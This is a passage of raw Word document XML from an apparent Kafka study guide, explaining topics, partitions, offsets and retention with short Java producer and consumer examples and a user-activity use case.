    <w:p w14:paraId="02F21959" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC32D59" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: A partition is a logical unit of data storage and helps Kafka scale horizontally. It allows for parallel processing and is the basic unit of data distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF63CA" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: An offset is a unique identifier within a partition that helps track which messages have been consumed. It enables consumers to read messages sequentially and resume from a specific point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1193E632" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are crucial in Kafka’s design for message processing, scalability, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0B424" w14:textId="65D7B395" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007149D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4933DDFB">
          <v:rect id="_x0000_i3080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45607382" w14:textId="1B1E09BF" w:rsidR="00106B80" w:rsidRPr="00CE4B95" w:rsidRDefault="007C61B8" w:rsidP="00106B80">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="768" w:name="_Toc196308248"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka topics, and how are they used</w:t>
      </w:r>
      <w:r w:rsidR="00106B80" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="768"/>
    </w:p>
    <w:p w14:paraId="3B57C8DE" w14:textId="2FB4F7F8" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logical channel or category to which records (messages) are published</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and from which consumers can read them. Think of a topic as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>named stream of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1CE48" w14:textId="77777777" w:rsidR="00612689"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790AB60">
          <v:rect id="_x0000_i3081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73136DA1" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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What is a Kafka Topic?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61B2A6" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in messaging systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F5933" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>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Producers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> write data to topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE03FF" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>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Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> read data from topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C1AE3" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>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Topics are </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-subscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning many consumers can read from the same topic independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B05AB8" w14:textId="77777777" w:rsidR="00612689"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40B2DB6">
          <v:rect id="_x0000_i3082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03952009" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Key Concepts of Top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2"/>
        <w:gridCol w:w="9222"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="21AA30AC" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFAAEEC" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E15494F" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="3AB1BA1E" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1919E937" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12149556" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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A topic is split into one or more </w:t>
            </w:r>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>partitions</w:t>
            </w:r>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, which allows Kafka to scale horizontally and parallelize consumption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="495F98AF" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F3DDB60" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1315E0D9" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Each message in a partition has a unique </w:t>
            </w:r>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>offset</w:t>
            </w:r>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (like an index).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="41A37E4F" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73713FB9" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Retention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AA6875A" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Kafka retains messages for a configurable amount of time, regardless of whether they are consumed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="383164C8" w14:textId="77777777" w:rsidR="00612689"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BE55C8F">
          <v:rect id="_x0000_i3083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F41C74" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Example Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F47924" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Producer writing to topic "orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D81C3E" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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producer.send(new ProducerRecord&lt;&gt;("orders", "orderId123", "Order data"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC038E9" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5419F0" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Consumer subscribing to "orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473D71D" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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consumer.subscribe(Arrays.asList("orders"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1065F4" w14:textId="77777777" w:rsidR="00612689"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91CB1B2">
          <v:rect id="_x0000_i3084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F240334" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Why Topics Are Powerful in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BB943" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>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Scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Topics can have many partitions → more consumers → high throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081EEAE0" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>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Fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka replicates topic data across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25255B4F" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>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Decouples</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems: Producers and consumers don’t need to know about each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CA790" w14:textId="77777777" w:rsidR="00612689"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CD9A1AD">
          <v:rect id="_x0000_i3085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D250C30" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Use Case Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51517536" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>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Topic: user-activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A8869" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>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Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Website logs user actions like login, click, logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581FFE48" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>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Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
